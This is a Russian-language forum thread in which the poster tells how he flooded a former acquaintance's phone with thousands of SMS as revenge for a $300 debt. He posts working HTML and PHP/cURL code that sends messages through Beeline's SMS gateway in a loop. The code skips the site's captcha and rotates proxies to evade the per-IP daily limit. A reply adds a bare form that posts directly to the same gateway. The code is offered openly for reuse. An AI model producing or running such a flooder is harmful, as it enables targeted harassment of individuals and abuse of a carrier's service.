Однажды мой знакомый киданул меня на 300$. Я довольно не плохо знал этого человека. Знал его имя, город в котором он живёт и номер его мобильника. Конечно ехать и убивать его за 9 тысячь рублей я не стал =) Но зато решил поглумиться и зафлудить его мобилу смсками. Все наверное знают, что с сайтов операторов можно отправлять смс сообщения - этим я и решил воспользоваться. Через минуту я узнал, что оператор кидалы довольно популярный билайн, который я и сам юзаю =). Потопал я на сайт билайна и нашел там форму отправки смс. И тут облом. Картинка защиты. Обойти методом подмены её не получилось, а о расспознание я и не думал, уж очень навороченая картинка для меня. Тогда я начал тупо ходить по сайту билайна, с каждой секундой всё сильнее признавая своё поражение. Тут я наткнулся на прогу, с помощью, которой как увиряют разработчики можно отсылать смс сообщения прямо с домашнего компьютера. Интересно, надо скачать подумал я. Скачал-поставил. Ага, работает. Ну и?! И тут я вдруг понял, что в этой программе нет никаких картинок защиты, в отличие от формы на сайте. Ну и раз программа отправляет смс сообщения без ввода кодов на картинке защиты значет и я могу. Я проснифил весь исходящий трафик от этой проги netsnifer'ом и увидел обычные http запросы. Через минуту был написан простенкий скрипт для флуда моего недруга. А еще через мгновение его телефон был закидан тысячями сообщений. Такая вот веселая история, не дай Бог никому =). Ах да, сам код флудера. Чуть не забыл =) INDEX.HTML : Code: <html> <center> <form name="tele2" action="send.php" method="POST"> <h3>Phone</h3><br> <input name="phone" value="" type="text" size="14" maxlength="12"><br> <h3>Count of messages</h3><br> <input name="count" value="10" type="text" size="14" maxlength="12"><br> <h3>Message text</h3><br> <textarea name="message" rows="5" cols="40"></textarea><br> <input name="submit" type="submit" value="Start spam"> </center> </html> Code: <? ini_set("error_log",'errors.txt'); ini_set("log_errors",'1'); echo '<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'; set_time_limit(0); $log=fopen("log.txt","w+"); $proxy=""; $proxycount=0; $proxyf=file("proxy.txt"); function setproxy(){ global $proxy; global $proxycount; global $proxyf; if (count($proxyf)==0) die; if ($proxycount==count($proxyf)) { {$proxy=$proxyf[0];$proxycount=0;exit;} } $proxy=trim($proxyf[$proxycount]); $proxycount=$proxycount+1; printandlog("Set proxy - ".$proxy); } function printandlog($text){ global $log; fputs($log,$text."\r\n"); echo $text.'<br>'; flush(); } function send($num,$message){ global $proxy; //$message=urlencode($message); $cr=curl_init("http://www.beonline.ru/servlet/send/sms/"); curl_setopt($cr, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"); curl_setopt($cr, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0); curl_setopt($cr, CURLOPT_TIMEOUT, 20); curl_setopt($cr, CURLOPT_HEADER, 1); curl_setopt($cr, CURLOPT_POSTFIELDS, "phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=&x=5&y=4"); curl_setopt($cr, CURLOPT_RETURNTRANSFER, 1); curl_setopt($cr, CURLOPT_REFERER, "http://BeeOnLine-Express"); curl_setopt($cr,CURLOPT_PROXY,$proxy); $r = curl_exec($cr); if (curl_error($cr)) { return 'connection_error'; curl_close($cr); exit; } curl_close($cr); echo $r; if (StrPos($r,"с данного IP-адреса")<>false) return "notsend";else return "send"; } if (!isset($_POST["phone"])) die; if (!isset($_POST["count"])) die; if (!isset($_POST["message"])) die; printandlog("Spam start"); printandlog("Found ".count($proxyf)." proxy"); for ($i=1;$i<=$_POST["count"];$i++) { while(1==1) { $tem=send(trim($_POST["phone"]),$message); if ($tem<>"send") setproxy(); else break; } printandlog($i." - Send"); } printandlog("All message send ok"); ?> Кому надо разберётся, что тут да как
Чувак, а как насчёт того что там такая хрень - типа всего 12 СМС с одного IP в день! Ты что и это тоже обошёл? Ты не гонишь? У меня на сайте такая форма есть http://faraon2005ramses.narod.ru/sms.html Это та же система как на сайте билайна, только без всяких "введите число на картинке" Что на это скажешь?
Глянул на твою форму : "Внимание!!! Количество отправляемых сообщений с одного Ip-адреса в сутки ограничено.". В моём примере юзаются прокси и это тоже обходится...
ага. чтоб ты запользовал, а чела потом завалили? тебе дали код-пользуй ==== ps подпись у тебя лажовая
Попробуй просто такую форму заполни: Code: <center> <h2>BeeLine SMS Send</h2> <form action='http://www.beonline.ru/servlet/send/sms/' method='post'> Phone: <small>(in format 79031234567)</small> <input type='text' maxlength=11 name='phone' /><br /> <input type='hidden' name='number_sms' value='number_sms_send' /> <input type='hidden' name='prf' value='7909' /> <input type='hidden' name='termtype' value='G' /> <textarea name='message' rows=10 cols=55></textarea><br /> <input type='hidden' name='translit' value='' /> <input type='hidden' name='x' value='5' /> <input type='hidden' name='y' value='4' /> <input type='submit' value='Send' /> </form> </center> Мне пришло
